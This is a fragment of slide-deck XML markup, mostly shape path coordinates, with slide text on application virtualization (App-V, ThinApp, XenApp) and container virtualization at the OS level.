                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4835753" y="2832449"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4871110" y="2867107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4906002" y="2902361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4940422" y="2938209"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4974364" y="2974646"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5007822" y="3011668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5040789" y="3049273"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5073260" y="3087457"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5105228" y="3126217"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5136686" y="3165548"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5167630" y="3205448"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5169789" y="3212717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5175472" y="3216449"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5183489" y="3217824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5192649" y="3218021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5194808" y="3217824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5200491" y="3216449"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5208508" y="3212717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5217668" y="3205448"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5224740" y="3201128"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5227097" y="3189747"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5224740" y="3173676"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5217668" y="3155283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5186073" y="3113735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5153908" y="3072830"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5121178" y="3032568"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5087893" y="2992951"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5054061" y="2953981"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5019689" y="2915659"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4984785" y="2877987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4949358" y="2840966"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4913415" y="2804598"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4876965" y="2768885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4840016" y="2733827"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4802575" y="2699428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4764651" y="2665688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4726252" y="2632609"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4687385" y="2600192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4648059" y="2568439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4608283" y="2537352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4568063" y="2506932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4527407" y="2477181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4486325" y="2448100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4444824" y="2419691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4402912" y="2391956"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4360597" y="2364896"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4317887" y="2338513"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4274790" y="2312808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4231314" y="2287783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4187467" y="2263439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4143258" y="2239779"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4098694" y="2216803"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4053783" y="2194513"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4008534" y="2172911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3962953" y="2151999"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3917051" y="2131777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3870834" y="2112248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3824310" y="2093414"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3777488" y="2075275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4716780" y="1171035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4723780" y="1154142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4726114" y="1139618"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4723780" y="1125118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4716780" y="1108297"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4699960" y="1101224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4685474" y="1098867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4670988" y="1101224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4654169" y="1108297"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3702304" y="2050129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3655534" y="2032613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3608280" y="2015953"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3560564" y="2000147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3512411" y="1985197"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3463844" y="1971102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3414890" y="1957862"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3365570" y="1945476"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3315910" y="1933945"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3265934" y="1923269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3215666" y="1913447"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3165130" y="1904480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3114351" y="1896368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3063352" y="1889109"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3012157" y="1882705"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2960792" y="1877155"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2909280" y="1872459"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2857645" y="1868617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2805912" y="1865629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2754104" y="1863495"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2702246" y="1862215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2650363" y="1861788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2650363" y="28289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2638615" y="7072"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2612771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384292" y="4331207"/>
              <a:ext cx="5156200" cy="1859280"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5156200" h="1859279">
                  <a:moveTo>
                    <a:pt x="743712" y="1383792"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="740803" y="1336954"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="732345" y="1291856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="718680" y="1248829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="700138" y="1208252"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="677075" y="1170457"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="649859" y="1135811"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="618807" y="1104633"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="584288" y="1077302"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="546658" y="1054163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="506247" y="1035545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="463410" y="1021816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418490" y="1013333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="371856" y="1010412"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="325208" y="1013333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="280289" y="1021816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237451" y="1035545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="197040" y="1054163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="159410" y="1077302"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124891" y="1104633"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93840" y="1135811"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66624" y="1170457"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43561" y="1208252"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25019" y="1248829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11353" y="1291856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2895" y="1336954"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1383792"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2895" y="1430642"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11353" y="1475740"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25019" y="1518767"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43561" y="1559344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66624" y="1597139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93840" y="1631784"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124891" y="1662963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="159410" y="1690293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="197040" y="1713433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237451" y="1732051"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="280289" y="1745780"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="325208" y="1754263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="371856" y="1757172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418490" y="1754263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="463410" y="1745780"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="506247" y="1732051"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="546658" y="1713433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="584288" y="1690293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="618807" y="1662963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="649859" y="1631784"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="677075" y="1597139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="700138" y="1559344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="718680" y="1518767"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="732345" y="1475740"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="740803" y="1430642"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="743712" y="1383792"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="5156200" h="1859279">
                  <a:moveTo>
                    <a:pt x="2950464" y="374142"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2947555" y="327215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2939072" y="282028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2925368" y="238925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2906788" y="198259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2883687" y="160401"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2856395" y="125666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2825292" y="94437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2790698" y="67043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2752991" y="43840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2712491" y="25196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2669565" y="11430"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2624569" y="2921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2577846" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2531110" y="2921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2486114" y="11430"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2443188" y="25196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2402687" y="43840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2364981" y="67043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2330386" y="94437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2299284" y="125666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2271992" y="160401"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2248890" y="198259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2230310" y="238925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2216607" y="282028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2208123" y="327215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2205228" y="374142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2208123" y="421081"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2216607" y="466267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2230310" y="509371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2248890" y="550037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2271992" y="587895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2299284" y="622630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2330386" y="653859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2364981" y="681253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2402687" y="704456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2443188" y="723099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2486114" y="736866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2531110" y="745375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2577846" y="748284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2624569" y="745375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2669565" y="736866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2712491" y="723099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2752991" y="704456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2790698" y="681253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2825292" y="653859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2856395" y="622630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2883687" y="587895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2906788" y="550037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2925368" y="509371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2939072" y="466267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2947555" y="421081"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2950464" y="374142"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="5156200" h="1859279">
                  <a:moveTo>
                    <a:pt x="5155692" y="1485150"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5152783" y="1438211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5144325" y="1393024"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5130660" y="1349921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5112118" y="1309255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5089055" y="1271397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5061839" y="1236662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5030787" y="1205433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4996269" y="1178039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4958639" y="1154836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4918227" y="1136192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4875390" y="1122426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4830470" y="1113917"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4783836" y="1110996"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4737189" y="1113917"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4692269" y="1122426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4649432" y="1136192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4609020" y="1154836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4571390" y="1178039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4536872" y="1205433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4505820" y="1236662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4478604" y="1271397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4455541" y="1309255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4436999" y="1349921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4423334" y="1393024"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4414875" y="1438211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4411980" y="1485150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4414875" y="1532077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4423334" y="1577263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4436999" y="1620367"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4455541" y="1661033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4478604" y="1698891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4505820" y="1733626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4536872" y="1764855"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4571390" y="1792249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4609020" y="1815452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4649432" y="1834095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4692269" y="1847862"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4737189" y="1856371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4783836" y="1859280"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4830470" y="1856371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4875390" y="1847862"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4918227" y="1834095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4958639" y="1815452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4996269" y="1792249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5030787" y="1764855"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5061839" y="1733626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5089055" y="1698891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5112118" y="1661033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5130660" y="1620367"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5144325" y="1577263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5152783" y="1532077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5155692" y="1485150"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="0075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584316" y="5520690"/>
            <a:ext cx="3454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40">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>01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96678" y="5621273"/>
            <a:ext cx="3454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40">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>03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85490" y="5528310"/>
            <a:ext cx="178435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55">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-75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3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5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140">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ix</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>X</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-45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60">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>nApp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36775" y="1882292"/>
            <a:ext cx="11982450" cy="29889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77520" marR="5080" indent="-465455">
              <a:lnSpc>
                <a:spcPct val="114999"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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Application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virtualization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involved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hosting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or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streaming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individual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software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applications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server.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Application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virtualization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solutions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for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different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software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companies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are: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750">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="5100320" marR="5476240" indent="1905">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-185">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>App-V </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-18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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>(M</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-25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40">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>cr</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-40">
                <a:solidFill>
                  <a:srgbClr val="404040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65">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>soft)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Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marR="321310">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-140">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>02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964926" y="5557266"/>
            <a:ext cx="240982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05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10">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>h</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-35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0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70">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>App</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>(VM</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-40">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>w</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-5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dirty="0" sz="220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35">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>e)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76620" y="306451"/>
            <a:ext cx="430276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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Container</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-125">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="85">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Virtualization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05984" y="760476"/>
            <a:ext cx="5940552" cy="365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533014" y="1933193"/>
            <a:ext cx="1118743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Container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virtualization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(application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cells)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helps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resource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separation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at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Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>OS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level.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73423" y="3733800"/>
            <a:ext cx="9714230" cy="1438910"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9714230" h="1438910">
                <a:moveTo>
                  <a:pt x="0" y="239775"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4869" y="191442"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18837" y="146429"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40940" y="105698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="70215" y="70215"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="105698" y="40940"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="146429" y="18837"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="191442" y="4869"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="239775" y="0"/>
                </a:lnTo>
                <a:lnTo>
